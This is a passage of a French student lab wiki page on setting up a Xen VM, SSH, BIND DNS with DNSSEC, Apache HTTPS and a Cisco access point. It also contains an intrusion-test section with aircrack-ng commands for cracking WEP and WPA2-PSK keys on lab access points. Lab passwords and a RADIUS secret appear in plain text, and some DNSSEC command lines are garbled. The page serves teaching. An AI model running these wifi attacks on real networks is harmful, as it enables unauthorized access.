 xl create -c /etc/xen/Paixdieu.cfg&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons les répertoires liés à xvda3 et vxda4 pour y placer /home et /var:&lt;br /&gt;
 mkdir /mnt/xvda3&lt;br /&gt;
 mkdir /mnt/xvda4&lt;br /&gt;
 mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Nous y déplaçons le répertoire /var/ dans xvda4:&lt;br /&gt;
 mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Pour monter les disques, nous modifions les lignes suivantes dans /etc/fstab:&lt;br /&gt;
 proc            /proc           proc    defaults        0       0&lt;br /&gt;
 devpts          /dev/pts        devpts  rw,noexec,nosuid,gid=5,mode=620 0  0&lt;br /&gt;
 /dev/xvda1 none swap sw 0 0&lt;br /&gt;
 /dev/xvda2 / ext4 noatime,nodiratime,errors=remount-ro 0 1&lt;br /&gt;
 '''/dev/xvda3 /home ext4 defaults 0 2'''&lt;br /&gt;
 '''/dev/xvda4 /var ext4 defaults 0 2'''&lt;br /&gt;
&lt;br /&gt;
Puis nous lancons la commande de montage:&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
Nous obtenons les partitions suivantes:&lt;br /&gt;
 '''lsblk'''&lt;br /&gt;
 &lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 '''xvda3 202:3 0 10G 0 disk /home'''&lt;br /&gt;
 '''xvda4 202:4 0 10G 0 disk /var'''&lt;br /&gt;
&lt;br /&gt;
Pour finir nous activons l'IPv6 dans l'interface en ajoutant les lignes suivantes dans /etc/network/interfaces:&lt;br /&gt;
 # This file describes the network interfaces available on your system&lt;br /&gt;
 # and how to activate them. For more information, see interfaces(5).&lt;br /&gt;
  &lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
 auto lo&lt;br /&gt;
 iface lo inet loopback&lt;br /&gt;
 &lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 193.48.57.177&lt;br /&gt;
 gateway 193.48.57.190&lt;br /&gt;
 netmask 255.255.255.240&lt;br /&gt;
 '''iface eth0 inet6 auto''' &lt;br /&gt;
 &lt;br /&gt;
 # post-up  ethtool -K eth0 tx off&lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 # The commented out line above will disable TCP checksumming which&lt;br /&gt;
 # might resolve problems for some users.  It is disabled by default&lt;br /&gt;
&lt;br /&gt;
Nous effectuons les commandes suivantes pour appliquer les changements:&lt;br /&gt;
 systemctl restart networking&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
Et nous obtenons les résultats comme ça:&lt;br /&gt;
 1: lo: &amp;lt;LOOPBACK,UP,LOWER_UP&amp;gt; mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000&lt;br /&gt;
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00&lt;br /&gt;
    inet 127.0.0.1/8 scope host lo&lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
    inet6 ::1/128 scope host &lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
 2: eth0: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UP group default qlen 1000&lt;br /&gt;
    link/ether 00:16:3e:95:13:ae brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
    inet 193.48.57.177/28 brd 193.48.57.191 scope global eth0&lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
    inet6 2001:7a8:116e:60b0:216:3eff:fe95:13ae/64 scope global dynamic mngtmpaddr &lt;br /&gt;
       valid_lft 2591995sec preferred_lft 604795sec&lt;br /&gt;
    inet6 fe80::216:3eff:fe95:13ae/64 scope link &lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
&lt;br /&gt;
Puis nous quittons la VM avec '''CTRL + ['''&lt;br /&gt;
&lt;br /&gt;
Pour y retourner:&lt;br /&gt;
 xen console Paixdieu&lt;br /&gt;
&lt;br /&gt;
Pour retourner sur sa machine virtuelle, il faut : &lt;br /&gt;
&lt;br /&gt;
- retourner sur capbreton&lt;br /&gt;
 ssh root@capbreton&lt;br /&gt;
- Relancer la VM (login : root | password : glopglopglop):&lt;br /&gt;
 xl create -c /etc/xen/Paixdieu.cfg&lt;br /&gt;
&lt;br /&gt;
Nous avons configuré la résolution de noms dans /etc/network/interfaces, en ajoutons la ligne suivante :&lt;br /&gt;
 # This file describes the network interfaces available on your system&lt;br /&gt;
 # and how to activate them. For more information, see interfaces(5).&lt;br /&gt;
  &lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
 auto lo&lt;br /&gt;
 iface lo inet loopback&lt;br /&gt;
 &lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 193.48.57.177&lt;br /&gt;
 gateway 193.48.57.190&lt;br /&gt;
 netmask 255.255.255.240&lt;br /&gt;
 '''dns-nameservers 8.8.8.8 8.8.4.4'''&lt;br /&gt;
 iface eth0 inet6 auto&lt;br /&gt;
&lt;br /&gt;
Puis nous avons vérifié son fonctionnement à l'aide d'un :&lt;br /&gt;
 ping www.google.com&lt;br /&gt;
 ...&lt;br /&gt;
 --- www.google.com ping statistics ---&lt;br /&gt;
 5 packets transmitted, 5 received, 0% packet loss, time 4005ms&lt;br /&gt;
&lt;br /&gt;
==Configuration du SSH== &lt;br /&gt;
&lt;br /&gt;
Dans /etc/ssh/sshd_config, ajout des lignes :&lt;br /&gt;
 Port 2223&lt;br /&gt;
 PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Puis :&lt;br /&gt;
 &amp;gt; systemctl restart ssh&lt;br /&gt;
 &amp;gt; systemctl status ssh&lt;br /&gt;
 ssh.service - OpenBSD Secure Shell server&lt;br /&gt;
     Loaded: loaded (/lib/systemd/system/ssh.service; enabled; vendor preset: e&amp;gt;&lt;br /&gt;
     Active: active (running) since Mon 2021-11-29 14:47:49 UTC; 2s ago&lt;br /&gt;
       Docs: man:sshd(8)&lt;br /&gt;
             man:sshd_config(5)&lt;br /&gt;
    Process: 3679 ExecStartPre=/usr/sbin/sshd -t (code=exited, status=0/SUCCESS)&lt;br /&gt;
   Main PID: 3680 (sshd)&lt;br /&gt;
      Tasks: 1 (limit: 230)&lt;br /&gt;
     Memory: 1.3M&lt;br /&gt;
        CPU: 21ms&lt;br /&gt;
     CGroup: /system.slice/ssh.service&lt;br /&gt;
             `-3680 sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups&lt;br /&gt;
&lt;br /&gt;
Puis nous testons le SSH depuis le terminal de la Zabeth :&lt;br /&gt;
 &amp;gt; ssh root@193.48.57.177 -p 2223&lt;br /&gt;
 password : glopglopglop&lt;br /&gt;
&lt;br /&gt;
Nous arrivons à nous connecter, la configuration du SSh est donc un succès.&lt;br /&gt;
&lt;br /&gt;
==Configuration du DNS==&lt;br /&gt;
&lt;br /&gt;
On a installé le package bind9 :&lt;br /&gt;
 &amp;gt;apt install bind9&lt;br /&gt;
&lt;br /&gt;
Sur le site gandit.net, nous avons modifié : &lt;br /&gt;
&lt;br /&gt;
Fenêtre Glue Records : ns1.paixdieu.site | 193.48.57.177&lt;br /&gt;
&lt;br /&gt;
Fenêtre Serveurs de noms :&lt;br /&gt;
&lt;br /&gt;
DNS Primaire : ns1.paixdieu.site | DNS Secondaire : ns6.gandi.net&lt;br /&gt;
Note : Après avoir constaté que le serveur secondaire ne se mettait pas à jour après chaque &amp;quot;notify&amp;quot; du serveur primaire, nous avons finalement choisi d'utiliser le serveur ns1.belle-rose.site en tant que serveur secondaire. &lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/resolv.conf, ajout de la ligne :&lt;br /&gt;
 nameserver 127.0.0.1&lt;br /&gt;
Afin de configurer le DNS par defaut.&lt;br /&gt;
&lt;br /&gt;
Puis nous passons à la configuration du DNS primaire :&lt;br /&gt;
On ajoute donc une zone lié à notre domaine paixdieu.site de type master et le chemin de son fichier de configuration et on permet les transferts d'informations avec le DNS secondaire ns6.gandi.net.&lt;br /&gt;
&lt;br /&gt;
On ajoute donc les lignes suivantes dans /etc/bind/named.conf.local:&lt;br /&gt;
 &amp;gt;vim /etc/bind/named.conf.local&lt;br /&gt;
 &lt;br /&gt;
 zone &amp;quot;paixdieu.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/db.paixdieu.site&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Nous avons séparés configuration des serveurs autorisés à dupliqué nos zones de la config de nos zones en insérant les acl suivantes dans le fichier /etc/bind/named.conf. &lt;br /&gt;
&lt;br /&gt;
 options {&lt;br /&gt;
	 directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
	 dnssec-validation auto;&lt;br /&gt;
 	 dnssec-enable yes;&lt;br /&gt;
	 dnssec-lookaside auto;&lt;br /&gt;
	 listen-on-v6 { any; };&lt;br /&gt;
	 allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
 acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
   217.70.177.40; //@ de ns6.gandi.net mais plus utilisé au final&lt;br /&gt;
   193.48.57.181; //@ de ns1.belle-rose.site&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Puis nous configurons la zone paixdieu.site, pour cela on ajoute les ns.&lt;br /&gt;
On ajoute les lignes suivantes dans /etc/bind/db.paixdieu.site:&lt;br /&gt;
 &amp;gt;vim /etc/bind/db.paixdieu.site&lt;br /&gt;
 @       IN      SOA     ns1.paixdieu.site. postmaster.paixdieu.site. (&lt;br /&gt;
                              4         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.paixdieu.site.&lt;br /&gt;
 @       IN      NS      ns1.belle-rose.site.&lt;br /&gt;
 ns1     IN      A       193.48.57.177&lt;br /&gt;
 www     IN      A       193.48.57.177&lt;br /&gt;
&lt;br /&gt;
Pour tester le bon fonctionnement du serveur DNS, nous utilisons la commande :&lt;br /&gt;
&lt;br /&gt;
 &amp;gt;host -t any paixdieu.site localhost&lt;br /&gt;
&lt;br /&gt;
Résultat, cela fonctionne bien :&lt;br /&gt;
&lt;br /&gt;
 Using domain server:&lt;br /&gt;
 Name: localhost&lt;br /&gt;
 Address: 127.0.0.1#53&lt;br /&gt;
 Aliases: &lt;br /&gt;
 paixdieu.site has SOA record ns1.paixdieu.site. postmaster.paixdieu.site. 4 604800 86400 2419200 604800&lt;br /&gt;
 paixdieu.site name server ns1.belle-rose.site.&lt;br /&gt;
 paixdieu.site name server ns1.paixdieu.site.&lt;br /&gt;
&lt;br /&gt;
==HTTPS / Certificat SSL==&lt;br /&gt;
Nous avons ensuite procéder à la création des certificats SSL.&lt;br /&gt;
Nous sommes donc aller sur Gandi, acheter un certificat.&lt;br /&gt;
Pour cela nous avons généré un CSR avec la commande :&lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout paixdieu.site.key -out paixdieu.site.csr&lt;br /&gt;
&lt;br /&gt;
-newkey tsa:2048 permet de générer une requête CSR et une clé privée utilisant le chiffrement RSA sur 2048 bits.&lt;br /&gt;
&lt;br /&gt;
-keyout paixdieu.site.key permet de sauvegarder le fichier de clé privée sous le nom &amp;quot;paixdieu.site.key&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
-out paixdieu.csr permet de sauvegarder le fichier CSR sous le nom &amp;quot;paixdieu.csr&amp;quot;. &lt;br /&gt;
&lt;br /&gt;
Lors du paramètrage, nous avons bien fait attention à rentrer &amp;quot;paixdieu.site&amp;quot; comme common name pour que le certificat soit validé par gandi.&lt;br /&gt;
Cela se fait en copant le contenu de paixdieu.site.csr dans la fenêtre correspondante lors de l'achat du certificat.&lt;br /&gt;
&lt;br /&gt;
Afin de bien sauvegarder les fichiers utilisés, nous les avvons sauvegarder dans le dossier suivant:&lt;br /&gt;
 ~/save_dns/paixdieu.site.csr&lt;br /&gt;
 ~/save_dns/paixdieu.site.key&lt;br /&gt;
&lt;br /&gt;
'''4.4 Sécurisation de serveur DNS par DNSSEC'''&lt;br /&gt;
&lt;br /&gt;
Activer DNSSEC&lt;br /&gt;
&lt;br /&gt;
Dans /etc/bind/named.conf.options on ajoute les lignes :&lt;br /&gt;
 dnssec-validation yes;&lt;br /&gt;
 dnssec-enable yes;&lt;br /&gt;
 dnssec-lookaside auto;&lt;br /&gt;
&lt;br /&gt;
On crée un répertoire /etc/bind/paixdieu.site.dnssed/&lt;br /&gt;
On crée la clef asymétrique de signature de clefs de zone &lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZO'''4.4 Sécurisation de serveur DNS par DNSSEC'''NE paixdieu.site&lt;br /&gt;
On crée la clef asymétrique de la zone pour signer les enregistrements&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1024 -n ZONE paixdieu.site&lt;br /&gt;
&lt;br /&gt;
On renomme les clés :&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ensuite, on crée la clé asymétrique de la zone pour signer les enregistrements :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1024 -n ZONE paixdieu.site&lt;br /&gt;
&lt;br /&gt;
On renomme les clés :&lt;br /&gt;
 mv Kpaixdieu.site.+005+17429.key paixdieu.site-ksk.key&lt;br /&gt;
 mv Kpaixdieu.site.+005+17429.private paixdieu.site-ksk.private&lt;br /&gt;
 mv Kpaixdieu.site.+005+28633.key paixdieu.site-zsk.key&lt;br /&gt;
 mv Kpaixdieu.site.+005+28633.private paixdieu.site-zsk.private&lt;br /&gt;
&lt;br /&gt;
On les inclue à la suite de /etc/bind/db.paixdieu.site&lt;br /&gt;
 $include /etc/bind/paixdieu.site.dnssec/paixdieu.site-ksk.key&lt;br /&gt;
 $include /etc/bind/paixdieu.site.dnssec/paixdieu.site-zsk.key&lt;br /&gt;
&lt;br /&gt;
Puis incrémente le numéro de série (5=&amp;gt;6)&lt;br /&gt;
&lt;br /&gt;
On signe des enregistrements de la zone&lt;br /&gt;
 dnssec-signzone -o paixdieu.site -k paixdie'''4.4 Sécurisation de serveur DNS par DNSSEC'''u.site-ksk ../db.paixdieu.site paixdieu.site-zsk&lt;br /&gt;
&lt;br /&gt;
Prise en compte du fichier signé&lt;br /&gt;
  &lt;br /&gt;
On modifie le fichier /etc/bind/named.conf.local de la manière suivante :&lt;br /&gt;
 zone &amp;quot;paixdieu.site&amp;quot; {&lt;br /&gt;
	type master;&lt;br /&gt;
	file &amp;quot;/etc/bind/db.paixdieu.site.signed&amp;quot;;&lt;br /&gt;
	allow-transfer {217.70.177.40; };&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Pour finir, nous allons sur gandi.net, sur notre nom de domaine dans DNSSEC et nous ajoutons les deux clefs (zsk et ksk avec l'algorithme 5 (RSA/SHA-1).&lt;br /&gt;
Et nous vérifions la bon fonctionnement du DNSSEC de la manière suivante :&lt;br /&gt;
 &amp;gt; dnssec-verify -o paixdieu.site db.paixdieu.site.signed&lt;br /&gt;
&lt;br /&gt;
 Loading zone 'paixdieu.site' from file 'db.paixdieu.site.signed'&lt;br /&gt;
&lt;br /&gt;
 Verifying the zone using the following algorithms:&lt;br /&gt;
 - RSASHA1&lt;br /&gt;
 Zone fully signed:&lt;br /&gt;
 Algorithm: RSASHA1: KSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
                     ZSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
&lt;br /&gt;
'''4.3 Sécurisation de site web par certificat'''&lt;br /&gt;
&lt;br /&gt;
On active le module SSL&lt;br /&gt;
 a2enmod ssl&lt;br /&gt;
&lt;br /&gt;
On configure le port 443 pour l'HTTPS en remplaçant dans le fichier ''/etc/apache2/ports.conf'' :&lt;br /&gt;
 Listen 80&lt;br /&gt;
 &lt;br /&gt;
 &amp;lt;IfModule ssl_module&amp;gt;&lt;br /&gt;
        Listen 443&lt;br /&gt;
 &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
par&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;IfModule mod_ssl.c&amp;gt;&lt;br /&gt;
         Listen 443&lt;br /&gt;
 &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On place paixdieu.site.key /etc/ssl/private/ et paixdieu.site.crt /etc/ssl/certs/&lt;br /&gt;
&lt;br /&gt;
On crée les liens symboliques pour les certificats&lt;br /&gt;
&lt;br /&gt;
 &amp;gt; c_rehash /etc/ssl/certs&lt;br /&gt;
 Doing /etc/ssl/certs&lt;br /&gt;
 WARNING: Skipping duplicate certificate ca-certificates.crt&lt;br /&gt;
 WARNING: Skipping duplicate certificate ca-certificates.crt&lt;br /&gt;
&lt;br /&gt;
On cofigure apache en ajoutant la ligne suivante dans le fichier /etc/apache2/apache2.conf :&lt;br /&gt;
 ServerName paixdieu.site&lt;br /&gt;
&lt;br /&gt;
On crée le fichier de configuration custom /etc/apache2/sites-available/000-paixdieu.site-ssl.conf :&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
         ServerName paixdieu.site&lt;br /&gt;
         ServerAlias www.paixdieu.site&lt;br /&gt;
 	ServerAdmin webmaster@localhost&lt;br /&gt;
         DocumentRoot /var/www/html &lt;br /&gt;
 	Redirect permanent / https://paixdieu.site/&lt;br /&gt;
  &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
  &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
 	ServerAdmin webmaster@localhost&lt;br /&gt;
 	ServerName paixdieu.site&lt;br /&gt;
 	ServerAlias www.paixdieu.site&lt;br /&gt;
 	DocumentRoot /var/www/html&lt;br /&gt;
 	SSLEngine on&lt;br /&gt;
 	SSLCertificateFile /etc/ssl/certs/paixdieu.site.crt&lt;br /&gt;
 	SSLCertificateKeyFile /etc/ssl/private/paixdieu.site.key&lt;br /&gt;
 	ErrorLog ${APACHE_LOG_DIR}/error.log&lt;br /&gt;
 	CustomLog ${APACHE_LOG_DIR}/access.log combined&lt;br /&gt;
  &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous activons le site ssl : &lt;br /&gt;
 a2ensite 000-paixdieu.site-ssl&lt;br /&gt;
&lt;br /&gt;
Nous arrivons bien à nous connecter à https://www.paixdieu.site&lt;br /&gt;
Et un test avec openssl nous renvoie le résultat suivant :&lt;br /&gt;
&lt;br /&gt;
 CONNECTED(00000003)&lt;br /&gt;
 Can't use SSL_get_servername&lt;br /&gt;
 depth=0 CN = paixdieu.site&lt;br /&gt;
 verify error:num=20:unable to get local issuer certificate&lt;br /&gt;
 verify return:1&lt;br /&gt;
 depth=0 CN = paixdieu.site&lt;br /&gt;
 verify error:num=21:unable to verify the first certificate&lt;br /&gt;
 verify return:1&lt;br /&gt;
 depth=0 CN = paixdieu.site&lt;br /&gt;
 verify return:1&lt;br /&gt;
 ---&lt;br /&gt;
 Certificate chain&lt;br /&gt;
 0 s:CN = paixdieu.site&lt;br /&gt;
   i:C = FR, ST = Paris, L = Paris, O = Gandi, CN = Gandi Standard SSL CA 2&lt;br /&gt;
 ---&lt;br /&gt;
 Server certificate&lt;br /&gt;
 -----BEGIN CERTIFICATE-----&lt;br /&gt;
 [...]&lt;br /&gt;
 -----END CERTIFICATE-----&lt;br /&gt;
 subject=CN = paixdieu.site&lt;br /&gt;
 issuer=C = FR, ST = Paris, L = Paris, O = Gandi, CN = Gandi Standard SSL CA 2&lt;br /&gt;
 ---&lt;br /&gt;
&lt;br /&gt;
= Architecture réseau =&lt;br /&gt;
&lt;br /&gt;
== L'architecture générale ==&lt;br /&gt;
[[Fichier:Pra diagrams.png]]&lt;br /&gt;
&lt;br /&gt;
== Les réseaux virtuels ==&lt;br /&gt;
&lt;br /&gt;
== Le routage du site (IPv4) ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Le routage du site (IPv6) ==&lt;br /&gt;
[insérer résumé]&lt;br /&gt;
&lt;br /&gt;
== Tests d'intrusion ==&lt;br /&gt;
'''5.2 Cassage de clef WEP d’un point d’accès WiFi'''&lt;br /&gt;
&lt;br /&gt;
Pendant que l'infrastructure réseau était en train d'être configurée, nous avons testé de casser une clé wep.&lt;br /&gt;
&lt;br /&gt;
Commandes réalisées sur un eeePC sous Linux :&lt;br /&gt;
&lt;br /&gt;
Récupération du nom de l'interface réseau WiFi du eeePC:&lt;br /&gt;
&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
On trouve : '''wlx40a5ef0f68cb'''&lt;br /&gt;
&lt;br /&gt;
Mettre la carte réseau WiFi en mode monitor sur le channel 4:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f68cb 4&lt;br /&gt;
&lt;br /&gt;
Après cette étape, il est possible que la carte réseau soit renommée par airmon-ng en wlan0mon.&lt;br /&gt;
&lt;br /&gt;
Vérification que celle-ci est bien en mode monitor :&lt;br /&gt;
&lt;br /&gt;
 iwconfig&lt;br /&gt;
&lt;br /&gt;
Ecouter les beacon WiFi sur cette carte réseau :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
De cette écoute , nous choisissons l'AP nommé '''cracotte09'''  avec le BSSID  : '''04:DA:D2:9C:50:58'''&lt;br /&gt;
&lt;br /&gt;
Nous simulons l'authentification sur cet AP :&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -9 -e cracotte09 -a 04:DA:D2:9C:50:58' wlan0mon&lt;br /&gt;
&lt;br /&gt;
 -9 : mode injection&lt;br /&gt;
 -e cracotte09 : nom du point d'accès&lt;br /&gt;
 -a 04:DA:D2:9C:50:58 : bssid du point d'accès&lt;br /&gt;
&lt;br /&gt;
Nous récupérons ensuite un nombre de frames conséquent émis par cet access point :&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -1 0 -e cracotte09 -a 04:DA:D2:9C:50:58 -h 40:A5:EF:01:28:D0 wlan0mon&lt;br /&gt;
&lt;br /&gt;
-1 : mode &amp;quot;fake authentification&amp;quot;&lt;br /&gt;
0 : délai entre les demandes d'authentifications&lt;br /&gt;
-h 40:A5:EF:01:27:D0 : bssid de l'interface réseau&lt;br /&gt;
&lt;br /&gt;
Résultat :&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Key_name.png|center|thumb|500px|Branchements duu eeee PC]]&lt;br /&gt;
&lt;br /&gt;
'''5.3 Cassage de clef WPA2-PSK d’un point d’accès WiFi'''&lt;br /&gt;
&lt;br /&gt;
Maintenant nous choisissions kracotte5 comme victime à l'aide du groupe de commande précédentes, c'est à dire :&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f68cb 4&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
Une fois que nous avons trouvé la victime (kracotte 5 ainsi que son BSSID), nous tentons de récupérer un handshake provenant de ce point d'accès et nous le stockons dans un fichier psk :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 4 --bssid 44:AD:D9:5F:87:04 -w psk wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous installons ensuite un utilitaire pour générer le dictionnaire de clé WPA2-PSK qui sera utilisé par aircrack-ng pour se connecter au point d'accès wifi kracotte5 :&lt;br /&gt;
&lt;br /&gt;
 apt-get install crunch&lt;br /&gt;
&lt;br /&gt;
Pour installer cette utilitaire nous pouvons relier l'eeePc au réseau de l'école à l'aide du deuxième câble ethernet disponnible à l'arrière des zabeth :&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:branchement_eee_pc.png|center|thumb|500px|Branchements duu eeee PC]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Une fois installé nous pouvons générer le dictionnaire :&lt;br /&gt;
 crunch 8 8 0123456789 -o password.lst&lt;br /&gt;
&lt;br /&gt;
Une fois généré, nous pouvons lancer la précédure de crackage (qui peut être très longue) :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -w password.lst -b 44:AD:D9:5F:87:04 psk*.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Crackage_wpa.png|center|thumb|500px|Crackage WPA]]&lt;br /&gt;
&lt;br /&gt;
'''5.5  Intrusion sur un serveur d’application Web'''&lt;br /&gt;
[[Fichier:Wiki intrusion 5.5.zip]]&lt;br /&gt;
&lt;br /&gt;
= Configuration point d'accès WiFI =&lt;br /&gt;
&lt;br /&gt;
Configuration du point d'accès WiFi E304 (primaire) :&lt;br /&gt;
&lt;br /&gt;
Installation de minicom sur macos : &lt;br /&gt;
 brew install minicom&lt;br /&gt;
&lt;br /&gt;
Récupération du nom du point d'accès connecté en USB (mac Os):&lt;br /&gt;
 ls /dev/cu*&lt;br /&gt;
&lt;br /&gt;
On obtient (en branchant et débranchant on identifie l'appareil qui apparait): &lt;br /&gt;
 /dev/cu.usbserial-FTB3OOLY&lt;br /&gt;
&lt;br /&gt;
Configuration du routeur WiFi :&lt;br /&gt;
 minicom -os&lt;br /&gt;
&lt;br /&gt;
Configuration à ajouter :&lt;br /&gt;
 Nom de device : /dev/cu.usbserial-FTB3OOLY&lt;br /&gt;
 Baudrate : 9600 8N1&lt;br /&gt;
&lt;br /&gt;
Sources : &lt;br /&gt;
- https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA5_2021/2022_G6&lt;br /&gt;
- https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau006.html#sec29&lt;br /&gt;
&lt;br /&gt;
 enable =&amp;gt; Passer en root (mdp : Cisco si par défaut)&lt;br /&gt;
 conf t &lt;br /&gt;
 hostname wifi-ima5sc-e304 =&amp;gt; (optionnel) on donne un nom à notre point d'accès&lt;br /&gt;
 ip domain-name plil.info =&amp;gt; ajoute un nom de domaine (utilisé pour la création de certificats)&lt;br /&gt;
 &lt;br /&gt;
Activation du ssh :&lt;br /&gt;
 &lt;br /&gt;
 crypto key generate rsa general-keys modulus 2048 =&amp;gt; Génération clés publique/privée &lt;br /&gt;
 ip ssh version 2 =&amp;gt; Activation ssh&lt;br /&gt;
&lt;br /&gt;
Configuration de l'authentification sur le point d'accès :&lt;br /&gt;
&lt;br /&gt;
 aaa new-model&lt;br /&gt;
 aaa authentication login eap_marguerite group radius_marguerite&lt;br /&gt;
 radius-server host 193.48.57.177 auth-port 1812 acct-port 1813 key secret_marguerite&lt;br /&gt;
 aaa group server radius radius_marguerite&lt;br /&gt;
 server 193.48.57.177 auth-port 1812 acct-port 1813&lt;br /&gt;
&lt;br /&gt;
Configuration du SSID :&lt;br /&gt;
 &lt;br /&gt;
 conf t&lt;br /&gt;
 dot11 ssid SSID_MARGUERITE&lt;br /&gt;
 vlan 11&lt;br /&gt;
  authentication open eap eap_marguerite&lt;br /&gt;
  authentication network-eap eap_marguerite&lt;br /&gt;
  authentication key-management wpa&lt;br /&gt;
  mbssid guest-mode&lt;br /&gt;
  exit&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
Association du SSID à l'interface Wi-Fi :&lt;br /&gt;
 &lt;br /&gt;
 conf t&lt;br /&gt;
 interface Dot11Radio0&lt;br /&gt;
  encryption vlan 11 mode ciphers aes-ccm tkip&lt;br /&gt;
  ssid SSID_MARGUERITE&lt;br /&gt;
  mbssid&lt;br /&gt;
  exit&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
Configuration du Vlan 11 :&lt;br /&gt;
 &lt;br /&gt;
 conf t&lt;br /&gt;
 interface Dot11Radio0.11&lt;br /&gt;
  encapsulation dot1Q 11&lt;br /&gt;
  no ip route-cache&lt;br /&gt;
  bridge-group 11&lt;br /&gt;
  bridge-group 11 subscriber-loop-control&lt;br /&gt;
  bridge-group 11 spanning-disabled&lt;br /&gt;
  bridge-group 11 block-unknown-source&lt;br /&gt;
  exit&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
Configuration interface filaire :&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet0.11&lt;br /&gt;
  encapsulation dot1Q 11&lt;br /&gt;
  bridge-group 11&lt;br /&gt;
  exit&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'IP du point d'accès et sa Gateway (n'est pas à faire par tous les groupes) :&lt;br /&gt;
 &lt;br /&gt;
 conf t&lt;br /&gt;
  ip default-gateway 10.1.0.2&lt;br /&gt;
  interface BVI 1&lt;br /&gt;
   ip address 10.1.0.4 255.255.255.0&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
'''Configuration du routeur en e304 :''' &lt;br /&gt;
&lt;br /&gt;
Configuration du VLAN1 :&lt;br /&gt;
  conf t&lt;br /&gt;
  interface vlan 1&lt;br /&gt;
   ip address 10.1.0.2 255.255.255.0&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
